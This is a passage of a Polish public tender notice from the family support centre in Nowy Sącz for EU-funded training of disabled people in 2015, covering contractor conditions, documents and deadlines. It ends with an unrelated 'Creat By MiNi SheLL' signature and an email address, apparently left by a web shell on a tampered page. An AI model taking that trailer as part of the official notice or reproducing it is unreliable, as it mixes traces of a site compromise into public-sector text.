21.Zamawiający dopuszcza wykonanie części zamówienia przy posłużeniu się innymi podmiotami - podwykonawcami. Jeżeli Wykonawca powierzy część zamówienia podwykonawcom, to Zamawiający na podstawie art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie te części zamówienia, której wykonanie powierzy podwykonawcom. 
22.Zamawiający nie dopuszcza możliwości prowadzenia zajęć metodą e- learning. 
23.Wykonawca zobowiązany jest zapewnić dla każdego uczestnika zajęć ubezpieczenie NNW w trakcie jego trwania, a także w drodze na nie i z powrotem na kwotę minimalną 5 000 zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu przed rozpoczęciem zajęć..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych do wysokości 50 % wartości zamówienia przetargowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art.22 ust.1 pzp
Ocena spełniania warunków udziału w postępowaniu przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą spełnia - nie spełnia, Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających spełnianie wymaganych warunków zostaną wykluczeni z postępowania.
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu, dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej , jednej usługi wskazanej dla zakresu - przedmiotu; ( łącznie lub odrębnie )dla każdego zadania nr I , II, III. przeprowadzonych w ramach realizacji projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencje, poświadczenie, zaświadczenie  itp. - zgodne z regulacją rozporządzenia R.M. z dnia 19 luty 2013 r. w sprawie rodzajów dokumentów.(Dz. U. 2013r. poz.231), że te usługi były wykonane lub są wykonywane należycie. 
Jeżeli w celu wykazania spełniania warunku w zakresie wiedzy i doświadczenia zamierza polegać na wiedzy i doświadczeniu innych podmiotów wówczas zobowiązany jest on zaangażować te podmioty do realizacji zamówienia odpowiednio do zakresu wykazanej wiedzy i doświadczenia tego podmiotu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba,osoby prowadzące posiadają wiedzę
 i doświadczenie w prowadzeniu zajęć z zakresu objętego niniejszym zamówieniem, 
tj. wykształcenie wyższe i uprawnienia do prowadzenia poradnictwa psychologicznego na grupę. Posiadającego doświadczenie w prowadzeniu szkoleń lub warsztatów lub treningów z obszaru pomocy i integracji społecznej w tym w zakresie treningów kompetencji społecznych lub psychospołecznych lub życiowych lub podstawowych dla osób niepełnosprawnych; do prowadzenia warsztatów i ćwiczeń w przedmiotowym zakresie. Wykonawca zapewni min. 1 opiekuna dla osób niepełnosprawnych (dla każdej grupy osób niepełnosprawnych ), zarówno na czas przejazdu jak również na czas trwania zajęć stacjonarnych, mającego doświadczenie w pracy z osobami niepełnosprawnymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów składanych przez wykonawców, o których mowa w pkt 11 SIWZ, reguluje m.in. rozporządzenie Prezesa Rady Ministrów z 19 luty 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z r.2013 poz.231).
2. Oświadczenia, o których mowa w pkt 11.2.1 SIWZ należy przedstawić w oryginale, pozostałe dokumenty wskazane w pkt 11 SIWZ mogą być przedstawione w formie oryginału  lub kopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem przez Wykonawcę (tj. osoby posiadające umocowanie prawne do reprezentowania firmy lub przez umocowanego Pełnomocnika). 
3. Dokument wielostronicowy przedłożony w formie kopii winien być potwierdzony za zgodność 
z oryginałem na każdej zapisanej (ponumerowanej) stronie.
4. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa, z którego wynika zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego pełnomocnictwo należy dołączyć do oferty.
6. Pełnomocnictwo powinno być złożone w oryginale albo w kopii poświadczonej notarialnie.
7. Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane 
wraz z tłumaczeniem na język polski. 
8. W przypadku wykonawców wspólnie ubiegających się udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa w pkt 11.2.3. SIWZ kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę
 lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności faktury - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, jak i dotyczyć mogą ustalenia ostatecznej wysokości należnego wynagrodzenia, w przypadku zmniejszenia liczby uczestników zajęć w stosunku do zapisów specyfikacji. Dopuszczone zmiany umowy j.w., zostaną wprowadzone w drodze aneksu do umowy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, 
ul. Kilińskiego 72 A, 
33-300 Nowy Sącz
TEL: (18) 443 82 51, FAX (18) 444 27 17,
e-mail: pcprnskadry@op.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2015 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com